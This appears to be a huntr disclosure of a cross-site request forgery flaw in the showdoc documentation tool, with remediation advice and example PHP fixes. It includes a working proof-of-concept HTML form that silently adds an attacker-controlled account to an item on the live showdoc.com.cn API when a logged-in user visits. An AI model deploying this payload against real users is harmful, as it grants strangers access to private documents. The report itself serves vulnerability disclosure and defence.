huntr report 063A339A-5D78-40D6-A96A-6716960E8134

Cross-Site Request Forgery (CSRF) in star7th/showdoc

2021-08-03 18:06:06
amammad
www.huntr.dev
8

EPSS: 0.001 (Low), percentile 31.2%

✍️ Description

Because of a CSRF vulnerability, an attacker can add any member to any item if a logged-in user visits the attacker's site.

🕵️‍♂️ Proof of Concept

1. Open PoC.html in Firefox or Safari.

2. Now you can verify that the member with the email address used in the PoC (evil@mail.com), which must already be registered beforehand, has access to the item with id 1531601670203340.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
      <input type="hidden" name="item_id" value="1531601670203340" />
      <input type="hidden" name="username" value="evil@mail.com" />
      <input type="hidden" name="cat_id" value="0" />
      <input type="hidden" name="member_group_id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



💥 Impact

This vulnerability makes it possible to reveal any item.

Fix

Set the SameSite attribute of the session cookies to Lax or Strict.
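The PoC above works because the browser attaches the victim's session cookie to a cross-site form POST. With SameSite=Lax (or Strict) on that cookie, a top-level POST initiated from another site is sent without the cookie, so the request arrives unauthenticated. The following PHP is an added illustration and is not showdoc's own code: it shows how a server can set the session cookie with SameSite and, as the usual complement for browsers that do not honour SameSite, verify a per-session CSRF token and the Origin header on a state-changing endpoint. Function names, the csrf_token field and the handler skeleton are assumptions; the origin https://www.showdoc.com.cn is taken from the PoC's form action.

```php
<?php
// Added example, not the project's code. Function and field names are assumptions.
declare(strict_types=1);

// 1. Configure the session cookie before session_start().
//    The options-array form of session_set_cookie_params() needs PHP >= 7.3.
function configure_session_cookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'domain'   => '',
        'secure'   => true,   // sent only over HTTPS
        'httponly' => true,   // not readable from JavaScript
        'samesite' => 'Lax',  // omitted on cross-site POSTs such as the PoC form
    ]);
    session_start();
}

// 2. Issue one CSRF token per session and embed it in every form the app
//    renders, e.g. <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// 3. Validate the submitted token with a constant-time comparison.
function csrf_token_is_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== '' && hash_equals($expected, $submitted);
}

// 4. Defence in depth: reject requests whose Origin (or, failing that, Referer)
//    is not the site's own origin. Requests carrying neither header are refused.
function origin_is_trusted(array $server, string $allowedOrigin): bool
{
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin === null && !empty($server['HTTP_REFERER'])) {
        $scheme = parse_url($server['HTTP_REFERER'], PHP_URL_SCHEME);
        $host   = parse_url($server['HTTP_REFERER'], PHP_URL_HOST);
        if ($scheme !== null && $host !== null) {
            $origin = $scheme . '://' . $host;
        }
    }
    return $origin !== null && strcasecmp($origin, $allowedOrigin) === 0;
}

// Hypothetical handler skeleton for a member-save style endpoint.
configure_session_cookie();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!origin_is_trusted($_SERVER, 'https://www.showdoc.com.cn')
        || !csrf_token_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Request rejected: CSRF check failed');
    }
    // ... continue with the authorised member save using $_POST['item_id'] etc.
}
```

Lax is normally enough for an application whose state changes all go through POST; Strict additionally drops the cookie on top-level navigations from other sites, which breaks deep links into the app for logged-in users, so choose it only where that is acceptable.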
